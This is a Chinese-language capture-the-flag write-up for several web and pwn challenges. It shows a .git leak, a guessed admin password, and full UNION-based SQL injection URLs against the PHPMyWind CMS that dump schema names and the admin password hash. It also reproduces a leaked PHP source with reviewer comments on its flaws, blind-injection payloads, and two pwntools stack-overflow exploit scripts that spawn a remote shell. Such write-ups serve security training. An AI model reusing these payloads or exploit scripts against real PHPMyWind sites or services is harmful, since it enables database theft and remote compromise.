brain(Y)
brainfuck
刮刮乐
.git泄漏
106.75.67.7:3080/.git/
后台
提示是后台密码为2017年的某一天……直接用20170505登录进去了……尴尬
PHPMyWIND
通过一篇文章 http://0day5.com/archives/1146/ 得知这个 CMS 存在 SQL 注入
查数据库名:
http://106.75.96.7:3089/shoppingcart.php?a=addshopingcart&typeid=10&goodsid=1 and @`'` /*!50000union*/ select null,null,null,null,null,null,null,null,null,null,SCHEMA_NAME,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from information_schema.SCHEMATA limit 0,1 --+or @`'` &buynum=1&attrid_1=%E9%BB%91%E8%89%B2&attrid_2=WCDMA
查表名:
http://106.75.96.7:3089/shoppingcart.php?a=addshopingcart&typeid=10&goodsid=1 and @`'` /*!50000union*/ select null,null,null,null,null,null,null,null,null,null,TABLE_NAME,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from information_schema.TABLES where TABLE_SCHEMA=0x7068706d7977696e645f6462 limit 0,1 --+or @`'` &buynum=1&attrid_1=%E9%BB%91%E8%89%B2&attrid_2=WCDMA
查列名:
http://106.75.96.7:3089/shoppingcart.php?a=addshopingcart&typeid=10&goodsid=1 and @`'` /*!50000union*/ select null,null,null,null,null,null,null,null,null,null,COLUMN_NAME,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from information_schema.COLUMNS where TABLE_NAME=0x706d775f61646d696e limit 0,1 --+or @`'` &buynum=1&attrid_1=%E9%BB%91%E8%89%B2&attrid_2=WCDMA
查admin的帐号密码的hash:
http://106.75.96.7:3089/shoppingcart.php?a=addshopingcart&typeid=10&goodsid=1 and @`'` /*!50000union*/ select null,null,null,null,null,null,null,null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from pmw_admin limit 0,1 --+or @`'` &buynum=1&attrid_1=%E9%BB%91%E8%89%B2&attrid_2=WCDMA
登录后台后,在模板文件那里可以看到 flag 文件
thinkseeker
http://106.75.117.4:3083/index.php~ 存在备份文件,导致源码泄露:
<?php
// NOTE(review): challenge source recovered from the index.php~ backup file.
// The reviewer comments below mark the weaknesses the writeup relies on;
// the code itself is reproduced unchanged.
// Suppresses all PHP warnings/notices, so database errors never reach the response.
error_reporting(0);
// Hard-coded token. It is NOT md5("admin"), so the check further down can only
// pass if $token is overwritten -- which the parse_str() call below allows.
$token="e00cf25ad42683b3df678c61f42c6bda";
// Input filter: rejects array values and any value matching the denylist.
// Only $_GET *values* are inspected (keys are not), and a denylist lets through
// anything it does not name (e.g. the /**/ sequences used in the payloads above).
foreach($_GET as $key=>$value){
if (is_array($value)){
die("Bad input!");
}
// Denylist of SQL keywords plus ',', ' ' and both quote characters; matched
// case-insensitively (/i). "sleep" and "benchmark" are listed twice.
$p="and|union|where|join|sleep|benchmark|if|sleep|benchmark|,| |\'|\"";
if(preg_match("/".$p."/is",$value)==1){
die("inj code!");
}
}
// parse_str() with a single argument registers every query-string parameter as a
// variable in the current scope: the client defines $userid, $password, $infoid and
// can overwrite $token. Safer form: parse_str($_SERVER['QUERY_STRING'], $params)
// and read explicitly from the $params array.
parse_str($_SERVER['QUERY_STRING']);
if($token==md5("admin")){
// Connection details are redacted ("XXXX") in the leaked copy. The @ suppresses
// connection errors; together with error_reporting(0) above, failures are silent.
$link=@mysql_connect("XXXX","XXXX","XXXX");
mysql_select_db("XXXX",$link);
// $userid is concatenated into the query unquoted and unescaped: SQL injection.
// Fix: prepared statement with bound parameters (mysqli/PDO) instead of string building.
$sql="select * from user where userid = ".$userid;
$query = mysql_query($sql);
if (mysql_num_rows($query) == 1) {
$arr = mysql_fetch_array($query);
// Loose (==) comparison of the stored password with client input; a strict
// comparison (===) or hash_equals() on a hashed value would be the safer form.
if($arr['password'] == $password) {
// Same injection pattern with $infoid.
$sql="select * from info where infoid=".$infoid;
$result=mysql_query($sql);
$arr = mysql_fetch_array($result);
// Each branch below returns a distinct message ("error sql!", "error password!",
// "error userid!"), which is what makes the boolean blind injection in the
// writeup observable. Mitigation: one generic error response for every failure.
if(empty($arr['content'])){
echo "error sql!";
}else{
echo $arr['content'];
}
}else{
echo "error password!";
}
}else{
echo "error userid!";
}
mysql_close($link);
}else{
echo "Bad token!";
}
?>
<html>
<head>
<title>web-test</title>
</head>
<body>
<!-- Login form submits via GET, so both fields end up in QUERY_STRING and are
     parsed by parse_str() above. -->
<form action="" method="get">
User ID:<input type="text" name="userid" length="50" /><br>
Password:<input type="password" name="password" length="50" /><br>
<input type="submit" value="submit"/>
</form>
</body>
</html>
可以看到需要确定的几个参数为token、password、userid、infoid
token值为:
md5("admin") == 21232f297a57a5a743894a0e4a801fc3
尝试userid=1,发现正确
构造payload查password:
http://106.75.117.4:3083/?userid=1%%26%%26ascii(mid(password/**/from/**/%s/**/for/**/1))=%s&password=1&token=21232f297a57a5a743894a0e4a801fc3&infoid=
盲注脚本跑一发
猜测infoid为1,正确
构造payload查flag:
http://106.75.117.4:3083/?userid=1%%26%%26ascii(mid((select/**/flag/**/from/**/flag)/**/from/**/%s/**/for/**/1))=%s&password=219d03ad2d752ad2806ea1de18613158&token=21232f297a57a5a743894a0e4a801fc3&infoid=1
盲注脚本跑一发
pwn1
简单的栈溢出,构造一个ROP即可
exp
from pwn import *
# pwn1 exploit script (Python 2 / pwntools: `.next()` on the search() generator
# is Python 2 syntax). The binary name and service address are the ones given
# in the writeup.
e=ELF('./pwn1_c1d0173e20a08feff046c8433f53fd37')
p=remote('106.75.93.221',10000)
# Address of system() taken from the binary's own symbol table (32-bit, hence p32).
sys_addr=p32(e.symbols['system'])
# Dummy return address placed after system(); not intended to be reached.
ret_addr='\x12\x12\x12\x12'
# Presumably 52 bytes of filler up to the saved return address, then the classic
# 32-bit call frame: callee (system), its return address, first argument (pointer
# to a "sh" string located in the binary). The 52 is specific to this binary.
payload='A'*52+sys_addr+ret_addr+p32(e.search('sh').next())
p.sendline(payload)
p.interactive()
p.close()
pwn5
也是简单的栈溢出(只会做栈溢出。。【捂脸】)
但是开了 canary
但显然 flag 已经被读入了内存。当触发 __stack_chk_fail 时,会打印出当前程序的名称(取自 argv[0]),只需要用 flag 的地址覆盖 argv[0] 即可。
exp
from pwn import *
# pwn5 exploit script (Python 2 / pwntools). Per the writeup: the binary has a
# stack canary, so the return address is not the target; the overflow instead
# reaches argv[0], which the stack-check failure message prints as the program name.
# `e` is loaded but not used by this script.
e=ELF('./pwnsss_d1b5b1011fc0ef9b3de9cb0ad261295a')
p=remote('106.75.93.221',10003)
# 292 bytes of filler, then 0x804a080 -- presumably the address of the in-memory
# flag buffer the writeup refers to; both values are specific to this binary.
payload='A'*292+p32(0x804a080)
p.sendline(payload)
p.interactive()
p.close()